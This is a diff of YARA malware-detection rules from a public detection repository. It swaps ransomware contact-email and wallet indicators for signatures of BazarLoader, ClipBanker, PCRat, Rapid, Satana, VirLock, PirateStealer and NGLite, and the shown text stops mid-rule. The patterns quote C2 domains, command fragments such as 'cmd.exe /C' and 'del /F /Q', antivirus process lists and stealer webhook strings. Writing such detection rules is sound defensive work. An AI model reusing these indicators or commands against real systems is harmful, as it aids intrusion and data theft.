+		hash1 = "21ab4357262993a042c28c1cdb52b2dab7195a6c30fa8be723631604dd330b29"
+		hash2 = "a2754d7995426b58317e437f8ed6770cd7bb7b18d971e23b2b300b75e34fa086"
+		hash3 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
+		hash4 = "b54a67062bdcd32dfa9f3d7b69780d2e6e4925777290bc34e8f979a1b4b72ea2"
+		hash5 = "b766522dd4189fef7775d663e5649ba9d8be8e03022039d20848fcbc3643e5f2"
+		hash6 = "d3606e2e36db0a0cb1b8168423188ee66332cae24fe59d63f93f5f53ab7c3029"
+		hash7 = "857e2f63a1078d49adc59a03482f7b362563f16fb251f174bdaa7759ed47922a"
+		hash8 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
 
 	strings:
-		$s1 = "emming@tutanota.com" ascii wide nocase
-		$s2 = "ampbel@protonmail.com" ascii wide nocase
-		$s3 = "asauribe@tutanota.com" ascii wide nocase
-		$s4 = "candietodd@tutanota.com" ascii wide nocase
-		$s5 = "kellyreiff@tutanota.com" ascii wide nocase
-		$s6 = "kevindeloach@protonmail.com" ascii wide nocase
-		$s7 = "sheilabeasley@tutanota.com" ascii wide nocase
+		$ua1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" fullword wide
+		$ua2 = "Mozilla/5.0 (Android; Mobile; rv:28.0) Gecko/28.0 Firefox/28.0" fullword wide
+		$ua3 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 520)" fullword wide
+		$ua4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7)" fullword wide
+		$ua5 = "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko" fullword wide
+		$ua6 = "Mozilla/5.0 (iPad; U; CPU OS 5_1_1 like Mac OS X; en-us) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3" fullword wide
+		$ua7 = "Mozilla/5.0 (Linux; Android 4.1; Galaxy Nexus Build/JRN84D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19" fullword wide
+		$ua8 = "Mozilla/5.0 (Linux; Android 7.1.1; ASUS_X017DA Build/NGI77B; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/1.5.1(11790) Chrome/74.0.3729.157 Mobile Safari/537.36" fullword wide
+		$ua9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0" fullword wide
+		$ua10 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" fullword wide
+		$ua11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword wide
+		$ua12 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" fullword wide
+		$n1 = "charset={[A-Za-z0-9\\-_]+}" fullword wide
+		$n2 = "Content-Length: {[0-9]+}" fullword wide
+		$n3 = "Location: {[0-9]+}" fullword wide
+		$n4 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+		$n5 = "{<html>}" fullword wide
+		$n6 = "&formid=" fullword ascii
+		$n7 = "/?id=" fullword ascii
+		$p1 = "\\milan\\Debug\\Milan.pdb" ascii
+		$p2 = "\\milan\\Release\\Milan.pdb" ascii
+		$p3 = "\\BackDor Last\\" ascii
+		$p4 = "\\BackDorLast\\" ascii
+		$s1 = "/q \"%s\" & waitfor" wide
+		$s2 = "/q \"%s\" & schtasks /delete" wide
+		$s3 = "*BOT@;" fullword ascii
+		$s4 = "mofcomp \"" fullword ascii
+		$s5 = "\"WQL\";};instance of " ascii
+		$s6 = "</svalue>" fullword wide
+		$s7 = "cmd.exe /C " wide nocase
+		$d1 = "akastatus.com" ascii
+		$d2 = "centosupdatecdn.com" ascii
+		$d3 = "checkinternet.org" ascii
+		$d4 = "cybersecnet.co.za" ascii
+		$d5 = "cybersecnet.org" ascii
+		$d6 = "defenderlive.com" ascii
+		$d7 = "defenderstatus.com" ascii
+		$d8 = "digitalmarketingagency.net" ascii
+		$d9 = "dnsanalizer.com" ascii
+		$d10 = "dnscatalog.net" ascii
+		$d11 = "dnscdn.org" ascii
+		$d12 = "dnsstatus.org" ascii
+		$d13 = "excsrvcdn.com" ascii
+		$d14 = "hpesystem.com" ascii
+		$d15 = "livednscdn.com" ascii
+		$d16 = "micrsoftonline.net" ascii
+		$d17 = "ndianmombais.com" ascii
+		$d18 = "online-analytic.com" ascii
+		$d19 = "securednsservice.net" ascii
+		$d20 = "sysadminnews.info" ascii
+		$d21 = "uctpostgraduate.com" ascii
+		$d22 = "updatecdn.net" ascii
+		$d23 = "web-traffic.info" ascii
+		$d24 = "windowsupdatecdn.com" ascii
+		$d25 = "wsuslink.com" ascii
+		$d26 = "zonestatistic.com" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $p* ) and ( 2 of ( $s* ) or 2 of ( $ua* ) ) ) or ( 5 of ( $n* ) and ( 2 of ( $ua* ) or 1 of ( $p* ) or 1 of ( $s* ) ) ) or ( 3 of ( $s* ) and ( 2 of ( $ua* ) or 5 of ( $n* ) ) ) or ( 2 of ( $d* ) and 6 of them ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Unlockyourfiles
+rule DITEKSHEN_MALWARE_Win_UNK05 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with UnlockYourFiles ransomware"
-		author = "ditekShen"
-		id = "fdc3ec49-66cc-5a0b-87a6-3660dd6f3b72"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects potential BazarLoader"
+		author = "ditekSHen"
+		id = "12f66315-f381-5910-b1d4-2cbf21c889a4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L279-L288"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8469-L8486"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a33dae7f08eb0c2415fbfdadf2cbbf90c68bc802352277422c6d0a2dbd62cd82"
+		logic_hash = "b3074f237fbaf449a53dcc219f48509db6af4c0d0859e6590563c3412be30aa8"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "4lok3r@tutanota.com" ascii wide nocase
-		$s2 = "4lok3r@protonmail.com" ascii wide nocase
+		$s1 = "/api/get" ascii wide
+		$s2 = "PARENTCMDLINE" fullword ascii
+		$s3 = "https://microsoft.com/telemetry/update.exe" ascii wide
+		$s4 = "api.opennicproject.org" fullword ascii wide
+		$s5 = "https://%hu.%hu.%hu.%hu:%u" fullword ascii wide
+		$s6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31" ascii wide
+		$s7 = "PARENTJOBID" fullword ascii wide
+		$s8 = "\\System32\\rundll32.exe" fullword ascii wide
+		$s9 = "{ccc38b40-5b04-4fb1-a684-07c7e448d4df}" fullword ascii wide
+		$s10 = "{065f6686-990b-46fc-829c-a53ec188a723}" fullword ascii wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Darkside
+rule DITEKSHEN_MALWARE_Win_Clipbanker01 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with DarkSide ransomware"
-		author = "ditekShen"
-		id = "7b29b9b9-4657-551e-b770-880a2278ef60"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects ClipBanker infostealer"
+		author = "ditekSHen"
+		id = "b56514f4-8362-5698-8142-be836b70a11a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L290-L299"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8488-L8521"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3c6cdb15cad19f1db38c0fe03ecb24d5cd4861a699aa2bee0f99b8dddacc8bd1"
+		logic_hash = "8ef90e22299a1009468761a4cdb8e2a92920d721f1a7ebceeb81a07e14f9156f"
 		score = 75
 		quality = 73
-		tags = ""
-		hash1 = "bafa2efff234303166d663f967037dae43701e7d63d914efc8c894b3e5be9408"
+		tags = "FILE"
 
 	strings:
-		$s1 = "breathcojunktab1987@yahoo.com" ascii wide nocase
+		$s1 = "Clipper" fullword wide
+		$s2 = "Ushell" fullword wide
+		$s3 = "Banker" fullword wide
+		$s4 = "ClipPurse" fullword wide nocase
+		$s5 = "SelfClip" fullword wide
+		$s6 = "Cliper" fullword wide
+		$s7 = "FHQD4313-33DE-489D-9721-6AFF69841DEA" fullword wide
+		$s8 = "Remove.bat" fullword wide
+		$s9 = "\\w{1}\\d{12}" fullword wide
+		$s10 = "SELECT * FROM Win32_ComputerSystem" fullword wide
+		$s11 = "red hat" fullword wide
+		$s12 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00
+                 2e 00 65 00 78 00 65 00 00 ?? 2f 00 63 00 72 00
+                 65 00 61 00 74 00 65 00 20 00 2f 00 73 00 63 00
+                 20 00 00 ?? 20 00 2f 00 6d 00 6f 00 20 00 00 ??
+                 20 00 2f 00 72 00 6c 00 20 00 00 ?? 20 00 2f 00
+                 74 00 6e 00 20 00 00 ?? 20 00 2f 00 74 00 72 00
+                 20 00 00 ?? 20 00 ?? 00 ?? 00 00 ?? 2f 00 64 00
+                 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00
+                 6e }
+		$s13 = "ClipChanger" fullword ascii
+		$s14 = "CheckVirtual" fullword ascii
+		$s15 = "InjReg" fullword ascii
+		$s16 = "SuicideFile" fullword ascii
+		$s17 = "HideFile" fullword ascii
+		$s18 = "AntiVm" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Spyro
+rule DITEKSHEN_MALWARE_Win_Zombieboy : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Spyro ransomware"
-		author = "ditekShen"
-		id = "9a42a9fd-dfaf-5719-acae-e7c3b92ecdc9"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects ZombieBoy Downloader"
+		author = "ditekSHen"
+		id = "c1345196-1686-534c-ab4c-557113c83411"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L301-L310"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8523-L8532"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b12b24b7b1b9800d249fd322532d957ddfc020c495ca89414d8d7e9fa7d58eb7"
+		logic_hash = "0840367c1b56c4c266f22400df95411ba7784b98919a922380e1ec789783bb65"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "blackspyro@tutanota.com" ascii wide nocase
-		$s2 = "blackspyro@mailfence.com" ascii wide nocase
+		$s1 = ":\\Users\\ZombieBoy\\" ascii wide
+		$s2 = "RookIE/1.0" fullword ascii wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryzerlo
+rule DITEKSHEN_MALWARE_Win_Pcrat : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Ryzerlo / HiddenTear / RSJON ransomware"
-		author = "ditekShen"
-		id = "1e8b79dc-4a81-5126-a7a3-ad7a2e8f62bf"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects PCRat / Gh0st"
+		author = "ditekSHen"
+		id = "de5b3e08-16da-56e2-a0a4-d8bed5840804"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L312-L320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8534-L8561"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2d925cac74411c3e408d674e27a27ae029d39977026a79df8f90edae345a31db"
+		logic_hash = "ad56d7d6a2bb6d09bc4530c31b51456b6bbca5def1810449fd2a31973cce18f8"
 		score = 75
-		quality = 73
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "darkjon@protonmail.com" ascii wide nocase
+		$s1 = "ClearEventLogA" fullword ascii
+		$s2 = "NetUserAdd" fullword ascii
+		$s3 = "<H1>403 Forbidden</H1>" fullword ascii
+		$s4 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible)" fullword ascii
+		$s6 = "<Enter>" fullword ascii
+		$s7 = "\\cmd.exe" fullword ascii
+		$s8 = "Program Files\\Internet Explorer\\IEXPLORE.EXE" fullword ascii
+		$s9 = "Collegesoft ScenicPlayer" fullword wide
+		$a1 = "360tray.exe" fullword ascii
+		$a2 = "avp.exe" fullword ascii
+		$a3 = "RavMonD.exe" fullword ascii
+		$a4 = "360sd.exe" fullword ascii
+		$a5 = "Mcshield.exe" fullword ascii
+		$a6 = "egui.exe" fullword ascii
+		$a7 = "kxetray.exe" fullword ascii
+		$a8 = "knsdtray.exe" fullword ascii
+		$a9 = "TMBMSRV.exe" fullword ascii
+		$a10 = "avcenter.exe" fullword ascii
+		$a11 = "ashDisp.exe" fullword ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) and 6 of ( $a* )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_PYSA
+rule DITEKSHEN_MALWARE_Win_Rapid : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with PYSA / Mespinoza ransomware"
-		author = "ditekShen"
-		id = "b26d472b-c94e-576d-b168-6f273bb8fca5"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Rapid ransomware"
+		author = "ditekSHen"
+		id = "3a23f344-8345-5ae8-aacb-f2f422d3fc9d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L322-L340"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8563-L8585"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cf0fbc0160f1d21efdb4a6935ae0d2206107042e3d020722f50d2c302aff246c"
+		logic_hash = "c3f1bffeb402951da8bcccc899b2cdeb3c218b342d8338c750b9ff275537b4b5"
 		score = 75
-		quality = 55
-		tags = ""
+		quality = 50
+		tags = "FILE"
 
 	strings:
-		$s1 = "luebegg8024@onionmail.org" ascii wide nocase
-		$s2 = "mayakinggw3732@onionmail.org" ascii wide nocase
-		$s3 = "lauriabornhat7722@protonmail.com" ascii wide nocase
-		$s4 = "DeborahTrask@onionmail.org" ascii wide nocase
-		$s5 = "AlisonRobles@onionmail.org" ascii wide nocase
-		$s6 = "NatanSchultz67@protonmail.com" ascii wide nocase
-		$s7 = "jonikemppi@onionmail.org" ascii wide nocase
-		$s8 = "lanerosalie49003@onionmail.org" ascii wide nocase
-		$s9 = "bernalmargaret645@onionmail.org" ascii wide nocase
-		$s10 = "carlhubbard2021@protonmail.com" ascii wide nocase
-		$u1 = "http://pysa2bitc" ascii wide
+		$s1 = "encblklen" fullword ascii
+		$s2 = ".rapid" fullword ascii
+		$s3 = "BgIAAACkAABSU0E" ascii
+		$s4 = "IFdlIHNlbmQ" ascii
+		$s5 = "Software\\EncryptKeys" fullword ascii
+		$s6 = "local_enc_private_key" fullword ascii
+		$s7 = "local_public_key" fullword ascii
+		$s8 = "How Recovery Files.txt" ascii
+		$s9 = "recovery.txt" ascii
+		$s10 = "thr %i run %s" fullword ascii
+		$s11 = " /TN Encrypter" ascii
+		$s12 = /Encrypter_\d+/ fullword ascii
+		$s13 = "BleepingComputer_rapid" ascii wide
+		$m1 = "tell us your unique ID - ID-" ascii
+		$m2 = "really want to restore your files?" ascii
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 1 of ( $m* ) and 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ranzylocker
+rule DITEKSHEN_MALWARE_Win_Satana : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with RanzyLocker ransomware"
-		author = "ditekShen"
-		id = "33478dc4-c0ec-5cc8-8620-79e770f6a773"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects Satana ransomware"
+		author = "ditekSHen"
+		id = "f3cb7cc4-3c63-50b2-8e19-d675abbb33f8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L354-L363"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8587-L8604"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc345257a3cca82a95e20505c94e90d8ac42240e1491ea1f34be121871673e26"
+		logic_hash = "b2946e8c37be4a57237999aaa0c0a760a181306320162e04bc6fc12a542b81d5"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 73
+		tags = "FILE"
+		snort_sid = "920269-920270"
 
 	strings:
-		$s1 = "eviluser@tutanota.com" ascii wide nocase
-		$s2 = "evilpr0ton@protonmail.com" ascii wide nocase
+		$bf1 = "Try Decrypt: uc_size = %d, c_size = %d" ascii
+		$bf2 = "dwMailSelector = %d  dwBtcSelector = %d" ascii
+		$bf3 = "%s: Error DecB: 0x%X" ascii
+		$bf4 = "MBR written to Disk# %d" ascii
+		$bf5 = "!SATANA!" ascii wide nocase
+		$bf6 = "1 -th start" fullword ascii
+		$bf7 = "id=%d&code=%d&sdata=%d.%d.%d %d %d %s %s %d&name=%s&md5=%s&dlen=%s" ascii
+		$bf8 = "threadAdminFlood: %s %s %s" wide
+		$bf9 = "%s: NET RES FOUND: %s" wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and 4 of ( $bf* ) ) or ( 5 of ( $bf* ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alkhal
+rule DITEKSHEN_MALWARE_Win_Virlock : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with AlKhal ransomware"
-		author = "ditekShen"
-		id = "32e14a6e-fc2e-5c0a-b8e3-33e219923d90"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects VirLock ransomware"
+		author = "ditekSHen"
+		id = "dbf46963-3e74-54a0-8f7d-b24436c3ea2c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L365-L374"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8606-L8624"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bd2d66a9cd33ab15b451158cd6c0e6579735653611ee2e6c8045a5807091938d"
+		logic_hash = "8d516a0d771d7134c0f917f010b3973ed53b4ee7e4a2cf0bb5daecf9867b0081"
 		score = 75
-		quality = 71
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "alkhal@tutanota.com" ascii wide nocase
-		$s2 = "cyrilga@tutanota.com" ascii wide nocase
+		$x1 = "BThere are two ways to pay a fine:" fullword wide
+		$x2 = "^Es gibt zwei M" fullword wide
+		$x3 = "glichkeiten, eine Strafe zahlen." fullword wide
+		$x4 = /usertile\d+\.bmp/ fullword wide
+		$s1 = "WinSock 2.0" fullword ascii
+		$s2 = "Running" fullword ascii
+		$s3 = "echo WScript.Sleep(50)>%TEMP%/file.vbs" fullword ascii
+		$s4 = "cscript %TEMP%/file.vbs" fullword ascii
+		$s5 = "del /F /Q file.js" fullword ascii
+		$s6 = "del /F /Q %1" fullword ascii
+		$s7 = "del /F /Q %0" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 2 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $x* ) ) ) ) or ( 8 of them )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_DECAF
+rule DITEKSHEN_MALWARE_Win_Piratestealer : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with DECAF ransomware"
-		author = "ditekShen"
-		id = "24422015-56f3-503e-a902-0183eb601b22"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects PirateStealer"
+		author = "ditekSHen"
+		id = "07278b99-b990-5016-8389-fbd27538a722"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L376-L408"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8626-L8644"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8fca3a6564cd11e625b65e7f0f278b79678368dd0c77440e9f8d46035e0c3426"
-		score = 75
-		quality = 73
-		tags = ""
+		logic_hash = "c29fbc6cfa9e529218fa7315481e0922dc10b2da729931b8580bdd76ecdf6b68"
+		score = 50
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "22eb687475f2c5ca30b@protonmail.com" ascii wide nocase
-		$s2 = { 4d 49 49 42 43 67 4b 43 41 51 45 41 71 34 6b 31
-                48 64 62 31 54 48 72 7a 42 42 65 4f 31 38 34 6b
-                6e 43 62 42 4b 72 30 33 61 70 66 58 71 6c 4f 6b
-                53 64 74 48 53 4a 67 66 79 49 71 4a 50 47 78 6c
-                0a 2f 63 46 69 73 4a 6d 56 58 52 33 2f 74 34 65
-                39 46 62 4c 73 45 49 75 54 70 39 50 4a 54 63 69
-                6f 6d 48 66 72 35 43 67 43 51 7a 68 6e 41 5a 30
-                41 76 6a 47 42 61 57 50 36 4b 70 43 79 66 44 6e
-                73 0a 79 62 72 75 79 4b 71 79 67 61 57 70 5a 53
-                41 6e 7a 52 64 42 2b 54 41 6b 75 35 69 71 79 38
-                71 31 56 77 6e 4e 35 37 51 42 6c 74 72 6f 30 59
-                4a 5a 38 65 6e 4b 5a 52 54 6c 63 7a 6d 74 6a 65
-                4f 70 0a 42 2f 78 75 54 4f 75 44 6a 6d 55 53 4e
-                69 47 79 69 6a 57 42 56 66 59 6b 37 73 56 58 6c
-                2f 6c 51 38 74 61 58 72 33 36 78 50 57 68 4d 49
-                47 30 45 71 52 56 72 46 56 2b 63 61 76 53 37 5a
-                34 76 61 0a 79 58 6d 63 66 35 35 4e 6b 70 4d 47
-                4b 4b 59 38 75 71 76 77 62 34 61 4c 49 4b 61 62
-                65 6b 32 6e 55 57 42 67 4e 67 53 4f 74 71 42 4c
-                4c 4c 32 41 32 62 59 2f 35 73 30 47 4a 2f 56 56
-                2b 45 6d 49 0a 58 37 2f 7a 49 2b 46 63 65 55 2b
-                64 63 4e 58 2f 69 72 30 75 6a 50 34 79 73 34 6d
-                2f 6a 6a 5a 44 34 77 49 44 41 51 41 42 }
+		$s1 = "PirateStealerBTW" wide
+		$s2 = "/PirateStealer/main/src/" wide
+		$s3 = "%WEBHOOK_LINK%" fullword wide
+		$s4 = "your_webhook_here" fullword wide
+		$s5 = "PirateMonsterInjector" ascii wide
+		$s6 = "DiscordProcesses" fullword ascii
+		$s7 = "GetDiscords" fullword ascii
+		$s8 = { 44 6f 77 6e 6c 6f 61 64 53 74 72 69 6e 67 00 47
+               65 74 46 6f 6c 64 65 72 50 61 74 68 00 57 65 62
+               68 6f 6f 6b 00 4b 69 6c 6c 00 50 72 6f 67 72 61
+               6d 00 53 79 73 74 65 6d 00 4d 61 69 6e 00 }
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Babuk
+rule DITEKSHEN_MALWARE_Win_Nglite : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Babuk ransomware"
-		author = "ditekShen"
-		id = "139cea69-9661-5cb7-bf74-a14e3556c759"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects NGLite"
+		author = "ditekSHen"
+		id = "b014ed4f-57b1-597e-befc-6e7f80855201"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L410-L426"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8646-L8668"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "129b1364bb59423aab1f5f67a4c2d2a76a9c4f55aa6aa1e59bcebc717a14ee19"
+		logic_hash = "d83663908949f69018461c73cf7137cf4ab16cc057cfe47942e6de0415ab5447"
 		score = 75
-		quality = 61
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "mitnickd@ctemplar.com" ascii wide nocase
-		$s2 = "zar8b@tuta.io" ascii wide nocase
-		$s3 = "recover300dollars@gmail.com" ascii wide nocase
-		$s4 = "support.3330@gmail.com" ascii wide nocase
-		$s5 = "decryptdelta@gmail.com" ascii wide nocase
-		$s6 = "pyotrmaksim@gmail.com" ascii wide nocase
-		$s7 = "retrievedata300@gmail.com" ascii wide nocase
-		$s8 = "3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs" ascii wide
-		$s9 = "46zdZVRjm9XJhdjpipwtYDY51NKbD74bfEffxmbqPjwH6efTYrtvbU5Et4AKCre9MeiqtiR51Lvg2X8dXv1tP7nxLaEHKKQ" ascii wide
+		$x1 = "/lprey/main.go" ascii
+		$x2 = "/NGLiteV1.01/lprey/" ascii
+		$x3 = "/ng.com/lprey/" ascii
+		$x4 = "/mnt/hgfs/CrossC2-2.2/src/" ascii
+		$x5 = "WHATswrongwithUu" ascii
+		$s1 = "main.Preylistener" fullword ascii
+		$s2 = "main.Runcommand" fullword ascii
+		$s3 = "main.RandomPass" fullword ascii
+		$s4 = "main.AesEncode" fullword ascii
+		$s5 = "main.RsaEncode" fullword ascii
+		$s6 = "main.AesDecode" fullword ascii
+		$s7 = "main.initonce" fullword ascii
+		$s8 = "main.SendOnce" fullword ascii
+		$s9 = "main.clientConf" fullword ascii
+		$s10 = "main.Sender" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rapid
+
+rule DITEKSHEN_MALWARE_Win_Kdcsponge : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Rapid ransomware"
-		author = "ditekShen"
-		id = "a1c6f3c0-2fec-5d96-9965-8129a843ae90"
-		date = "2024-01-23"
-		modified = "2024-01-23"
+		description = "Detects KdcSponge"
+		author = "ditekSHen"
+		id = "8832a141-a85d-5604-992e-7e9bd892d410"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
